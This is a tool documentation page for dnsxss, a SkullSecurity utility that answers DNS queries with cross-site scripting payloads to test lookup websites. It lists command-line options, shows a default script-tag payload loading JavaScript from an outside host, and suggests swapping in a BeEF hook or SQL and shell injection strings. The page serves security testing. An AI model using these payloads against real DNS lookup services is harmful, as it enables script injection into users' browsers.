From SkullSecurity
Jump to navigation Jump to search


dnsxss is designed to send back malicious responses to DNS queries in order to test DNS lookup servers for common classes of vulnerabilities. By default, dnsxss returns a string containing some Javascript code to all MX, CNAME, NS, and TEXT requests, in the hopes that the DNS lookup will be displayed in a browser.

When I originally wrote this, I tested it on a handful of Internet sites. Every one of them was vulnerable.

I haven't tried testing other vulnerabilities, like SQL injection or shell injection, but I suspect that this is a great attack vector for those and other vulnerabilities, because people don't realize that malicious traffic can be returned.


./dnsxss [-t <test string>]
 -a <address>
    The address sent back to the user when an A request is made. Can be used
    to disguise this as a legitimate DNS server. Default:
 -aaaa <address>
    The address sent back to the user when an AAAA (IPv6) request is made. Can
    be used to disguise this as a legitimate DNS server. Default: ::1.
 -d <domain>
    The domain to put after the test string. It should be the same as the
    one that points to your host.
 --payload <data>
    The string containing the HTML characters, that will ultimately test for
    the cross-site scripting vulnerability. Ultimately, this can contain any
    type of attack, such as sql-injection. One thing to note is that DNS
    generally seems to filter certain characters; in my testing, anything with
    an ASCII code of 0x20 (Space) or lower was replaced with an escaped
    /xxx, and brackets had a backslash added before them.
    <script src='http://www.skullsecurity.org/test-js.js'></script>
    Note that unless a TEXT record is requested, spaces are replaced with
    slashes ('/'), which work in Firefox but not IE.
    By default, spaces in the payload are replaced with slashes ('/') because
    the DNS protocol doesn't like spaces. Use this flag to bypass that
 --test <domain>
    Test to see if we are the authoritative nameserver for the given domain.
 -u --username
    The username to use when dropping privileges. Default: nobody.
 -s --source <address>
    The local address to bind to. Default: any (
 -p --port <port>
    The local port to listen on. I don't recommend changing this.
    default: 53


Running this program without arguments returns a pretty typical cross-site scripting string:

$ dig @localhost -t TXT test
test.                   1       IN      TXT     "<script src='http://www.skullsecurity.org/test-js.js'></script>.test"

This will display a messagebox on the user's screen alerting them to the issue. You can change the payload using the --payload argument and point it at, for example, a BeEF server.

Authoritative DNS server

Many functions of this tool require you to be the authoritative nameserver for a domain. This typically costs money, but is fairly cheap and has a lot of benefits. If you aren't sure whether or not you're the authority, you can use the --test argument to this program, or you can directly run the dnstest program, also included.